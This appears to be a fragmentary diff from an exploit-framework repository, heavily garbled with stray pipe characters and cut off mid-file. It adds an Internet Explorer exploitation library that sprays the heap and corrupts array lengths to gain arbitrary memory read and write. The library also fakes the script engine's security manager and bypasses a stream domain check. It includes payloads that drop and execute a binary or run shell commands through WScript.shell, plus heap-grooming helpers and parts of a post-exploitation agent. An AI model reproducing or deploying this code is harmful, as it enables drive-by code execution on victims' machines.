||||||
ua_version = "6.0";
|
ua_version = "6.0";
|
||||||
} else if (window.createPopup) {
|
} else if (window.createPopup) {
|
||||||
|
|
|
@ -0,0 +1,426 @@
|
||||||
|
|
||||||
|
|
||||||
|
ExpLib = (function() {
|
||||||
|
|
||||||
|
function ExpLib( num_arrays, arr_size, base, payload ) {
|
||||||
|
this.arr1 = null;
|
||||||
|
this.arr2 = null;
|
||||||
|
this.base = base;
|
||||||
|
this.arr_size = arr_size;
|
||||||
|
this.arr_arr = null;
|
||||||
|
// Allows to control the contents of the sprayed memory.
|
||||||
|
// Have into account some array positions will be corrupted
|
||||||
|
// while leaking and modifying things.
|
||||||
|
this.arr_contents = [];
|
||||||
|
|
||||||
|
this.payload = payload;
|
||||||
|
this.modules = {}
|
||||||
|
this.getproc = null;
|
||||||
|
this.loadlibrary = null;
|
||||||
|
|
||||||
|
// Offset to the Origin URL in the Stream, modifying it
|
||||||
|
// allows to bypass msado15.SecurityCheck(), allowing
|
||||||
|
// for example to write stream contents to filesystem.
|
||||||
|
this.stream_origin = 0x44;
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.resolveAPI = function( modulename, procname ) {
|
||||||
|
var module = this.resolveModule( modulename );
|
||||||
|
|
||||||
|
return this.callAPI( this.getproc, module, this.allocateString(procname) );
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.resolveModule = function( modulename ) {
|
||||||
|
if ( this.modules[modulename] )
|
||||||
|
return this.modules[modulename];
|
||||||
|
|
||||||
|
var module = this.callAPI( this.loadlibrary, this.allocateString(modulename) );
|
||||||
|
this.modules[modulename] = module;
|
||||||
|
return module;
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.spray = function() {
|
||||||
|
this.arr_arr = new Array( num_arrays );
|
||||||
|
|
||||||
|
var decl = "[";
|
||||||
|
|
||||||
|
for ( var i = 0; i < this.arr_size - 1; ++ i ) {
|
||||||
|
decl += '0,';
|
||||||
|
}
|
||||||
|
|
||||||
|
decl += '0';
|
||||||
|
decl += ']';
|
||||||
|
|
||||||
|
for ( var i = 0; i < num_arrays; ++ i ) {
|
||||||
|
this.arr_arr[i] = eval(decl);
|
||||||
|
for(var j = 0; j < this.arr_contents.length; j++) {
|
||||||
|
this.arr_arr[i][j] = this.arr_contents[j];
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
// Should be used before calling spray()
|
||||||
|
ExpLib.prototype.setArrContents = function(contents) {
|
||||||
|
for(var i = 0; i < this.arr_size && i < contents.length; i++) {
|
||||||
|
this.arr_contents[i] = contents[i];
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.setValue = function(i1, i2, v) {
|
||||||
|
this.arr_arr[i1][i2] = v;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
ExpLib.prototype.setValueByAddr = function(index, addr, v) {
|
||||||
|
this.arr_arr[index][((addr % 0x1000) - 0x20) / 4] = v;
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.read32 = function(addr) {
|
||||||
|
if ( addr % 4 ) {
|
||||||
|
// error
|
||||||
|
}
|
||||||
|
|
||||||
|
if ( addr >= this.arr2_member_base ) {
|
||||||
|
return this.arr2[(addr - this.arr2_member_base)/4];
|
||||||
|
} else {
|
||||||
|
return this.arr2[0x40000000 - (this.arr2_member_base - addr)/4]
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.write32 = function(addr, value) {
|
||||||
|
if ( addr % 4 ) {
|
||||||
|
// error
|
||||||
|
}
|
||||||
|
|
||||||
|
if ( value >= 0x80000000 )
|
||||||
|
value = -(0x100000000 - value);
|
||||||
|
|
||||||
|
//alert(((addr - this.arr2_member_base)/4).toString(16));
|
||||||
|
if ( addr >= this.arr2_member_base ) {
|
||||||
|
this.arr2[(addr - this.arr2_member_base)/4] = value;
|
||||||
|
} else {
|
||||||
|
this.arr2[0x40000000 - (this.arr2_member_base - addr) / 4] = value;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.read8 = function(addr) {
|
||||||
|
var value = this.read32( addr & 0xfffffffc );
|
||||||
|
switch ( addr % 4 ) {
|
||||||
|
case 0: return (value & 0xff);
|
||||||
|
case 1: return ((value >> 8) & 0xff);
|
||||||
|
case 2: return ((value >> 16) & 0xff);
|
||||||
|
case 3: return ((value >> 24) & 0xff);
|
||||||
|
}
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.write8 = function(addr, value) {
|
||||||
|
var original_value = this.read32( addr & 0xfffffffc );
|
||||||
|
var new_value;
|
||||||
|
|
||||||
|
switch ( addr % 4 ) {
|
||||||
|
case 0:
|
||||||
|
new_value = (original_value & 0xffffff00) | (value & 0xff);
|
||||||
|
break;
|
||||||
|
|
||||||
|
case 1:
|
||||||
|
new_value = (original_value & 0xffff00ff) | ((value & 0xff) << 8);
|
||||||
|
break;
|
||||||
|
case 2:
|
||||||
|
new_value = (original_value & 0xff00ffff) | ((value & 0xff) << 16);
|
||||||
|
break;
|
||||||
|
case 3:
|
||||||
|
new_value = (original_value & 0x00ffffff) | ((value & 0xff) << 24);
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
this.write32( addr & 0xfffffffc, new_value );
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
ExpLib.prototype.writeBytes = function(addr, bytes) {
|
||||||
|
for ( var i = 0; i + 3 < bytes.length; i += 4 ) {
|
||||||
|
var value = (bytes[i] & 0xff) | ((bytes[i+1] & 0xff) << 8) |
|
||||||
|
((bytes[i + 2] & 0xff) << 16) | ((bytes[i + 3] & 0xff) << 24);
|
||||||
|
|
||||||
|
this.write32( addr + i, value );
|
||||||
|
}
|
||||||
|
|
||||||
|
for ( ; i < bytes.length; ++ i ) {
|
||||||
|
this.write8( addr + i, bytes[i] );
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.writeString = function(addr, s) {
|
||||||
|
var bytes = [];
|
||||||
|
var i = 0;
|
||||||
|
for ( ; i < s.length; ++ i ) {
|
||||||
|
bytes[i] = s.charCodeAt(i);
|
||||||
|
}
|
||||||
|
|
||||||
|
bytes[i] = 0;
|
||||||
|
|
||||||
|
this.writeBytes( addr, bytes );
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.writeStringW = function(addr, s) {
|
||||||
|
var bytes = [];
|
||||||
|
var i = 0;
|
||||||
|
for ( ; i < s.length; ++i ) {
|
||||||
|
bytes[i * 2] = s.charCodeAt(i);
|
||||||
|
bytes[i * 2 + 1] = 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
bytes[s.length * 2] = 0;
|
||||||
|
bytes[s.length * 2 + 1] = 0;
|
||||||
|
|
||||||
|
this.writeBytes( addr, bytes );
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.read16 = function(addr) {
|
||||||
|
if ( addr % 2 ) {
|
||||||
|
// error, not aligned
|
||||||
|
}
|
||||||
|
|
||||||
|
var value = this.read32( addr & 0xfffffffc );
|
||||||
|
switch ( addr % 4 ) {
|
||||||
|
case 0: return (value & 0xffff);
|
||||||
|
case 1: return ((value >> 8) & 0xffff);
|
||||||
|
case 2: return ((value >> 16) & 0xffff);
|
||||||
|
case 3: /*not supported*/ break;
|
||||||
|
}
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.strequal = function(addr, s) {
|
||||||
|
for ( var i = 0; i < s.length; ++ i ) {
|
||||||
|
if ( this.read8(addr + i) != s.charCodeAt(i) )
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
ExpLib.prototype.getModuleBase = function(addr) {
|
||||||
|
|
||||||
|
var cur_addr = addr;
|
||||||
|
|
||||||
|
while ( cur_addr > 0 ) {
|
||||||
|
|
||||||
|
if ( (this.read32(cur_addr) & 0xffff) == 0x5a4d ) {
|
||||||
|
return cur_addr;
|
||||||
|
}
|
||||||
|
|
||||||
|
cur_addr -= 0x10000;
|
||||||
|
}
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
ExpLib.prototype.getModuleBaseFromIAT = function(base, name) {
|
||||||
|
var import_table = base + this.read32( base + this.read32(base + 0x3c) + 0x80 );
|
||||||
|
var cur_table = import_table;
|
||||||
|
|
||||||
|
while ( cur_table < import_table + 0x1000 ) {
|
||||||
|
|
||||||
|
var name_addr = base + this.read32(cur_table + 12);
|
||||||
|
if ( this.strequal( name_addr, name ) ) {
|
||||||
|
var iat = base + this.read32(cur_table + 16);
|
||||||
|
var func = this.read32(iat);
|
||||||
|
while ( 0 == func ) {
|
||||||
|
iat += 4;
|
||||||
|
func = this.read32(iat);
|
||||||
|
}
|
||||||
|
|
||||||
|
return this.getModuleBase( func & 0xFFFF0000 );
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
cur_table += 20;
|
||||||
|
}
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.getProcAddress = function(base, procname) {
|
||||||
|
var export_table = base + this.read32( base + this.read32(base + 0x3c) + 0x78 );
|
||||||
|
var num_functions = this.read32( export_table + 20 );
|
||||||
|
var addr_functions = base + this.read32( export_table + 28 );
|
||||||
|
var addr_names = base + this.read32( export_table + 32 );
|
||||||
|
var addr_ordinals = base + this.read32( export_table + 36 );
|
||||||
|
|
||||||
|
for ( var i = 0; i < num_functions; ++ i ) {
|
||||||
|
var name_addr = this.read32( addr_names + i * 4 ) + base;
|
||||||
|
if ( this.strequal( name_addr, procname ) ) {
|
||||||
|
var ordinal = this.read16( addr_ordinals + i * 2 );
|
||||||
|
var result = this.read32( addr_functions + ordinal * 4 ) + base;
|
||||||
|
return result;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.searchBytes = function(pattern, start, end) {
|
||||||
|
|
||||||
|
if ( start >= end || start + pattern.length > end )
|
||||||
|
return 0;
|
||||||
|
|
||||||
|
var pos = start;
|
||||||
|
while ( pos < end ) {
|
||||||
|
for ( var i = 0; i < pattern.length; ++ i ) {
|
||||||
|
if ( this.read8(pos + i) != pattern[i] )
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
if ( i == pattern.length ) {
|
||||||
|
return pos;
|
||||||
|
}
|
||||||
|
|
||||||
|
++ pos;
|
||||||
|
}
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
ExpLib.prototype.getError = function(msg) {
|
||||||
|
return this.err_msg;
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.setError = function(msg) {
|
||||||
|
this.err_msg = msg;
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.setStreamOrigin = function(offset) {
|
||||||
|
this.stream_origin = offset;
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.getStreamOrigin = function() {
|
||||||
|
return this.stream_origin;
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.memcpy = function(dst, src, size) {
|
||||||
|
var i = 0;
|
||||||
|
for ( ; i < size - 4; i += 4 ) {
|
||||||
|
this.write32( dst + i, this.read32(src + i) );
|
||||||
|
}
|
||||||
|
|
||||||
|
for ( ; i < size; ++ i ) {
|
||||||
|
this.write8( dst + i, this.read8(src + i) );
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.go = function() {
|
||||||
|
|
||||||
|
var i = 0;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
for ( ; i < this.arr_arr.length - 1; ++ i ) {
|
||||||
|
this.arr_arr[i][this.arr_size + 0x1c / 4] = 0;
|
||||||
|
|
||||||
|
if ( this.arr_arr[i][this.arr_size + 0x18 / 4] == this.arr_size ) {
|
||||||
|
this.arr_arr[i][this.arr_size + 0x14 / 4] = 0x3fffffff;
|
||||||
|
this.arr_arr[i][this.arr_size + 0x18 / 4] = 0x3fffffff;
|
||||||
|
|
||||||
|
this.arr_arr[i + 1].length = 0x3fffffff;
|
||||||
|
|
||||||
|
if ( this.arr_arr[i+1].length == 0x3fffffff ) {
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
if ( i >= this.arr_arr.length - 1 ) {
|
||||||
|
this.setError( "Cannot find array with corrupt length!" );
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
this.arr1_idx = i;
|
||||||
|
this.arr2_idx = i + 1;
|
||||||
|
|
||||||
|
this.arr1 = this.arr_arr[i];
|
||||||
|
this.arr2 = this.arr_arr[i + 1];
|
||||||
|
|
||||||
|
this.arr2_base = this.base + 0x1000;
|
||||||
|
this.arr2_member_base = this.arr2_base + 0x20;
|
||||||
|
|
||||||
|
var func_addr = this.leakAddress(ActiveXObject);
|
||||||
|
var script_engine_addr = this.read32(this.read32(func_addr + 0x1c) + 4);
|
||||||
|
|
||||||
|
//alert(script_engine_addr.toString(16));
|
||||||
|
|
||||||
|
var original_securitymanager = this.read32( script_engine_addr + 0x21c );
|
||||||
|
if ( !original_securitymanager ) {
|
||||||
|
// let security manager to be valid
|
||||||
|
try {
|
||||||
|
var WshShell = new ActiveXObject("WScript.shell");
|
||||||
|
} catch (e) {}
|
||||||
|
|
||||||
|
original_securitymanager = this.read32( script_engine_addr + 0x21c );
|
||||||
|
}
|
||||||
|
|
||||||
|
var original_securitymanager_vtable = this.read32(original_securitymanager);
|
||||||
|
var securitymanager_size = 0x28;
|
||||||
|
var fake_securitymanager = 0x1a1b2010;
|
||||||
|
var fake_securitymanager_vtable = fake_securitymanager + 0x28;
|
||||||
|
//alert(original_securitymanager.toString(16));
|
||||||
|
|
||||||
|
this.memcpy( fake_securitymanager, original_securitymanager, securitymanager_size );
|
||||||
|
this.memcpy( fake_securitymanager_vtable, original_securitymanager_vtable, 0x70 );
|
||||||
|
this.write32( fake_securitymanager, fake_securitymanager_vtable );
|
||||||
|
this.write32(script_engine_addr + 0x21c, fake_securitymanager);
|
||||||
|
|
||||||
|
var jscript9_base = this.getModuleBase( this.read32(script_engine_addr) & 0xffff0000 );
|
||||||
|
var jscript9_code_start = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x104);
|
||||||
|
var jscript9_code_end = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x108);
|
||||||
|
|
||||||
|
|
||||||
|
this.write32( fake_securitymanager_vtable + 0x14,
|
||||||
|
this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x08], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 8; */
|
||||||
|
|
||||||
|
this.write32( fake_securitymanager_vtable + 0x10,
|
||||||
|
this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x04], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 4; */
|
||||||
|
|
||||||
|
this.payload.execute(this);
|
||||||
|
|
||||||
|
|
||||||
|
/*
|
||||||
|
* restore
|
||||||
|
*/
|
||||||
|
|
||||||
|
this.write32( script_engine_addr + 0x21c, original_securitymanager );
|
||||||
|
|
||||||
|
return true;
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.leakAddress = function(obj) {
|
||||||
|
this.arr_arr[this.arr2_idx + 1][2] = obj;
|
||||||
|
return this.read32(this.arr2_member_base + 0x1008);
|
||||||
|
}
|
||||||
|
|
||||||
|
ExpLib.prototype.switchStreamOrigin = function(stream) {
|
||||||
|
var obj = this.leakAddress(stream);
|
||||||
|
var stream_obj = this.read32(obj + 0x30);
|
||||||
|
//var url_addr = this.read32(stream_obj + 0x3c);
|
||||||
|
var url_addr = this.read32(stream_obj + this.stream_origin);
|
||||||
|
|
||||||
|
/*
|
||||||
|
* bypass domain check
|
||||||
|
*/
|
||||||
|
this.writeStringW( url_addr, 'file:///C:/1.htm' );
|
||||||
|
}
|
||||||
|
|
||||||
|
return ExpLib;
|
||||||
|
|
||||||
|
})();
|
|
@ -0,0 +1,33 @@
|
||||||
|
function payload_drop_exec(pe) {
|
||||||
|
|
||||||
|
this.execute = function(explib) {
|
||||||
|
|
||||||
|
var WshShell = new ActiveXObject("WScript.shell");
|
||||||
|
var temp = WshShell.ExpandEnvironmentStrings("%TEMP%");
|
||||||
|
var filename = temp + "\\a.exe";
|
||||||
|
|
||||||
|
var bStream = new ActiveXObject("ADODB.Stream");
|
||||||
|
var txtStream = new ActiveXObject("ADODB.Stream");
|
||||||
|
bStream.Type = 1;
|
||||||
|
txtStream.Type = 2;
|
||||||
|
|
||||||
|
bStream.Open();
|
||||||
|
txtStream.Open();
|
||||||
|
|
||||||
|
explib.switchStreamOrigin(txtStream);
|
||||||
|
|
||||||
|
txtStream.WriteText(pe);
|
||||||
|
txtStream.Position = 2;
|
||||||
|
txtStream.CopyTo( bStream );
|
||||||
|
txtStream.Close();
|
||||||
|
|
||||||
|
explib.switchStreamOrigin(bStream);
|
||||||
|
|
||||||
|
bStream.SaveToFile(filename, 2);
|
||||||
|
bStream.Close();
|
||||||
|
|
||||||
|
oExec = WshShell.Exec(filename);
|
||||||
|
}
|
||||||
|
|
||||||
|
return this;
|
||||||
|
}
|
|
@ -0,0 +1,10 @@
|
||||||
|
function payload_exec(cmd) {
|
||||||
|
|
||||||
|
this.execute = function(explib) {
|
||||||
|
|
||||||
|
var WshShell = new ActiveXObject("WScript.shell");
|
||||||
|
var oExec = WshShell.Exec(cmd);
|
||||||
|
}
|
||||||
|
|
||||||
|
return this;
|
||||||
|
}
|
|
@ -0,0 +1,192 @@
|
||||||
|
//heapLib2 namespace
|
||||||
|
function heapLib2() { }
|
||||||
|
|
||||||
|
//These are attributes that will not actually create a bstr
|
||||||
|
//and directly use the back-end allocator, completely bypassing the cache
|
||||||
|
var global_attrs = ["title", "lang", "class"];
|
||||||
|
|
||||||
|
heapLib2.ie = function(element, maxAlloc)
|
||||||
|
{
|
||||||
|
//128mb
|
||||||
|
this.maxAlloc = 0x8000000;
|
||||||
|
|
||||||
|
//make sure that an HTML DOM element is passed
|
||||||
|
if(!element.nodeType || element.nodeType != 1)
|
||||||
|
throw "alloc.argument: element not valid";
|
||||||
|
|
||||||
|
this.element = element;
|
||||||
|
|
||||||
|
if(maxAlloc)
|
||||||
|
this.maxAlloc = maxAlloc;
|
||||||
|
|
||||||
|
//empty the cache
|
||||||
|
this.Oleaut32EmptyCache();
|
||||||
|
this.Oleaut32FillCache();
|
||||||
|
this.Oleaut32EmptyCache();
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
heapLib2.ie.prototype.newelement = function(element)
|
||||||
|
{
|
||||||
|
//make sure that an HTML DOM element is passed
|
||||||
|
if(!element.nodeType || element.nodeType != 1)
|
||||||
|
throw "alloc.argument: element not valid";
|
||||||
|
|
||||||
|
this.element = element;
|
||||||
|
}
|
||||||
|
|
||||||
|
heapLib2.ie.prototype.alloc = function(attr_name, size, cache_ok)
|
||||||
|
{
|
||||||
|
if(typeof(cache_ok)==='undefined')
|
||||||
|
cache_ok = false;
|
||||||
|
else
|
||||||
|
cache_ok = true;
|
||||||
|
|
||||||
|
//make sure the attribute name is a string
|
||||||
|
if(typeof attr_name != "string")
|
||||||
|
throw "alloc.argument: attr_name is not a string";
|
||||||
|
|
||||||
|
//make sure that the attribute name is not already present in the html element
|
||||||
|
if(this.element.getAttribute(attr_name))
|
||||||
|
throw "alloc.argument: element already contains attr_name: " + attr_name;
|
||||||
|
|
||||||
|
//ensure the size is a number
|
||||||
|
if(typeof size != "number")
|
||||||
|
throw "alloc.argument: size is not a number: " + size;
|
||||||
|
|
||||||
|
//make sure the size isn't one of the special values
|
||||||
|
if(!cache_ok && (size == 0x20 || size == 0x40 || size == 0x100 || size == 0x8000))
|
||||||
|
throw "alloc.argument: size cannot be flushed from cache: " + size;
|
||||||
|
|
||||||
|
if(size > this.maxAlloc)
|
||||||
|
throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size;
|
||||||
|
|
||||||
|
//the size must be at a 16-byte boundary this can be commented out but
|
||||||
|
//the allocations will be rounded to the nearest 16-byte boundary
|
||||||
|
if(size % 16 != 0)
|
||||||
|
throw "alloc.argument: size be a multiple of 16: " + size;
|
||||||
|
|
||||||
|
//20-bytes will be added to the size
|
||||||
|
//<4-byte size><data><2-byte null>
|
||||||
|
size = ((size / 2) - 6);
|
||||||
|
|
||||||
|
//May have to change this due to allocation side effects
|
||||||
|
var data = new Array(size).join(cache_ok ? "C" : "$");
|
||||||
|
|
||||||
|
var attr = document.createAttribute(attr_name);
|
||||||
|
this.element.setAttributeNode(attr);
|
||||||
|
this.element.setAttribute(attr_name, data);
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
//These items will allocate/free memory and should really
|
||||||
|
//only be used once per element. You can use a new element
|
||||||
|
//by calling the 'newelement' method above
|
||||||
|
heapLib2.ie.prototype.alloc_nobstr = function(val)
|
||||||
|
{
|
||||||
|
//make sure the aval is a string
|
||||||
|
if(typeof val != "string")
|
||||||
|
throw "alloc.argument: val is not a string";
|
||||||
|
|
||||||
|
var size = (val.length * 2) + 6;
|
||||||
|
|
||||||
|
if(size > this.maxAlloc)
|
||||||
|
throw "alloc_nobstr.val: string length cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size;
|
||||||
|
|
||||||
|
var i = 0;
|
||||||
|
var set_gattr = 0;
|
||||||
|
for(i = 0; i < global_attrs.length; i++)
|
||||||
|
{
|
||||||
|
curr_gattr = global_attrs[i];
|
||||||
|
if(!this.element.getAttribute(curr_gattr))
|
||||||
|
{
|
||||||
|
this.element.setAttribute(curr_gattr, "");
|
||||||
|
this.element.setAttribute(curr_gattr, val);
|
||||||
|
set_gattr = 1;
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if(set_gattr == 0)
|
||||||
|
throw "alloc_nobstr: all global attributes are assigned, try a new element";
|
||||||
|
}
|
||||||
|
|
||||||
|
//completely bypass the cache, useful for heap spraying (see heapLib2_test.html)
|
||||||
|
heapLib2.ie.prototype.sprayalloc = function(attr_name, str)
|
||||||
|
{
|
||||||
|
//make sure the attribute name is a string
|
||||||
|
if(typeof attr_name != "string")
|
||||||
|
throw "alloc.argument: attr_name is not a string";
|
||||||
|
|
||||||
|
//make sure that the attribute name is not already present in the html element
|
||||||
|
if(this.element.getAttribute(attr_name))
|
||||||
|
throw "alloc.argument: element already contains attr_name: " + attr_name;
|
||||||
|
|
||||||
|
//ensure the size is a number
|
||||||
|
if(typeof str != "string")
|
||||||
|
throw "alloc.argument: str is not a string: " + typeof str;
|
||||||
|
|
||||||
|
var size = (str.length * 2) + 6;
|
||||||
|
|
||||||
|
//make sure the size isn't one of the special values
|
||||||
|
if(size <= 0x8000)
|
||||||
|
throw "alloc.argument: bigalloc must be greater than 0x8000: " + size;
|
||||||
|
|
||||||
|
if(size > this.maxAlloc)
|
||||||
|
throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size;
|
||||||
|
|
||||||
|
var attr = document.createAttribute(attr_name);
|
||||||
|
this.element.setAttributeNode(attr);
|
||||||
|
this.element.setAttribute(attr_name, str);
|
||||||
|
}
|
||||||
|
|
||||||
|
heapLib2.ie.prototype.free = function(attr_name, skip_flush)
|
||||||
|
{
|
||||||
|
if(typeof(skip_flush)==='undefined')
|
||||||
|
skip_flush = false;
|
||||||
|
else
|
||||||
|
skip_flush = true;
|
||||||
|
|
||||||
|
//make sure that an HTML DOM element is passed
|
||||||
|
if(!this.element.nodeType || this.element.nodeType != 1)
|
||||||
|
throw "alloc.argument: element not valid";
|
||||||
|
|
||||||
|
//make sure the attribute name is a string
|
||||||
|
if(typeof attr_name != "string")
|
||||||
|
throw "alloc.argument: attr_name is not a string";
|
||||||
|
|
||||||
|
//make sure that the attribute name is not already present in the html element
|
||||||
|
if(!this.element.getAttribute(attr_name))
|
||||||
|
throw "alloc.argument: element does not contain attribute: " + attr_name;
|
||||||
|
|
||||||
|
//make sure the cache is full so the chunk returns the general purpose heap
|
||||||
|
if(!skip_flush)
|
||||||
|
this.Oleaut32FillCache();
|
||||||
|
|
||||||
|
this.element.setAttribute(attr_name, null);
|
||||||
|
|
||||||
|
if(!skip_flush)
|
||||||
|
this.Oleaut32EmptyCache()
|
||||||
|
}
|
||||||
|
|
||||||
|
heapLib2.ie.prototype.Oleaut32FillCache = function()
|
||||||
|
{
|
||||||
|
for(var i = 0; i < 6; i++)
|
||||||
|
{
|
||||||
|
this.free("cache0x20"+i, true);
|
||||||
|
this.free("cache0x40"+i, true);
|
||||||
|
this.free("cache0x100"+i, true);
|
||||||
|
this.free("cache0x8000"+i, true);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
heapLib2.ie.prototype.Oleaut32EmptyCache = function()
|
||||||
|
{
|
||||||
|
for(var i = 0; i < 6; i++)
|
||||||
|
{
|
||||||
|
this.alloc("cache0x20"+i, 0x20, true);
|
||||||
|
this.alloc("cache0x40"+i, 0x40, true);
|
||||||
|
this.alloc("cache0x100"+i, 0x100, true);
|
||||||
|
this.alloc("cache0x8000"+i, 0x8000, true);
|
||||||
|
}
|
||||||
|
}
|
|
@ -1,10 +1,18 @@
|
||||||
function postInfo(path, data) {
|
function postInfo(path, data, cb) {
|
||||||
var xmlHttp = new XMLHttpRequest();
|
var xmlHttp = new XMLHttpRequest();
|
||||||
|
|
||||||
if (xmlHttp.overrideMimeType) {
|
if (xmlHttp.overrideMimeType) {
|
||||||
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
|
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
|
||||||
}
|
}
|
||||||
|
|
||||||
xmlHttp.open('POST', path, false);
|
xmlHttp.open('POST', path, !!cb);
|
||||||
xmlHttp.send(data);
|
|
||||||
|
if (cb) {
|
||||||
|
xmlHttp.onreadystatechange = function() {
|
||||||
|
if (xmlHttp.readyState == 4) { cb.apply(this, arguments); }
|
||||||
|
};
|
||||||
|
}
|
||||||
|
|
||||||
|
xmlHttp.send(data);
|
||||||
|
return xmlHttp;
|
||||||
}
|
}
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -1,4 +1,3 @@
|
||||||
import ctypes
|
|
||||||
import fnmatch
|
import fnmatch
|
||||||
import getpass
|
import getpass
|
||||||
import os
|
import os
|
||||||
|
@ -9,8 +8,15 @@ import socket
|
||||||
import struct
|
import struct
|
||||||
import subprocess
|
import subprocess
|
||||||
import sys
|
import sys
|
||||||
|
import time
|
||||||
|
|
||||||
|
try:
|
||||||
|
import ctypes
|
||||||
|
has_ctypes = True
|
||||||
has_windll = hasattr(ctypes, 'windll')
|
has_windll = hasattr(ctypes, 'windll')
|
||||||
|
except ImportError:
|
||||||
|
has_ctypes = False
|
||||||
|
has_windll = False
|
||||||
|
|
||||||
try:
|
try:
|
||||||
import pty
|
import pty
|
||||||
|
@ -24,6 +30,12 @@ try:
|
||||||
except ImportError:
|
except ImportError:
|
||||||
has_pwd = False
|
has_pwd = False
|
||||||
|
|
||||||
|
try:
|
||||||
|
import SystemConfiguration as osxsc
|
||||||
|
has_osxsc = True
|
||||||
|
except ImportError:
|
||||||
|
has_osxsc = False
|
||||||
|
|
||||||
try:
|
try:
|
||||||
import termios
|
import termios
|
||||||
has_termios = True
|
has_termios = True
|
||||||
|
@ -36,6 +48,126 @@ try:
|
||||||
except ImportError:
|
except ImportError:
|
||||||
has_winreg = False
|
has_winreg = False
|
||||||
|
|
||||||
|
if has_ctypes:
|
||||||
|
#
|
||||||
|
# Windows Structures
|
||||||
|
#
|
||||||
|
class SOCKADDR(ctypes.Structure):
|
||||||
|
_fields_ = [("sa_family", ctypes.c_ushort),
|
||||||
|
("sa_data", (ctypes.c_uint8 * 14))]
|
||||||
|
|
||||||
|
class SOCKET_ADDRESS(ctypes.Structure):
|
||||||
|
_fields_ = [("lpSockaddr", ctypes.POINTER(SOCKADDR)),
|
||||||
|
("iSockaddrLength", ctypes.c_int)]
|
||||||
|
|
||||||
|
class IP_ADAPTER_UNICAST_ADDRESS(ctypes.Structure):
|
||||||
|
_fields_ = [
|
||||||
|
("s", type(
|
||||||
|
'_s_IP_ADAPTER_UNICAST_ADDRESS',
|
||||||
|
(ctypes.Structure,),
|
||||||
|
dict(_fields_ = [
|
||||||
|
("Length", ctypes.c_ulong),
|
||||||
|
("Flags", ctypes.c_uint32)
|
||||||
|
])
|
||||||
|
)),
|
||||||
|
("Next", ctypes.c_void_p),
|
||||||
|
("Address", SOCKET_ADDRESS),
|
||||||
|
("PrefixOrigin", ctypes.c_uint32),
|
||||||
|
("SuffixOrigin", ctypes.c_uint32),
|
||||||
|
("DadState", ctypes.c_uint32),
|
||||||
|
("ValidLifetime", ctypes.c_ulong),
|
||||||
|
("PreferredLifetime", ctypes.c_ulong),
|
||||||
|
("LeaseLifetime", ctypes.c_ulong),
|
||||||
|
("OnLinkPrefixLength", ctypes.c_uint8)]
|
||||||
|
|
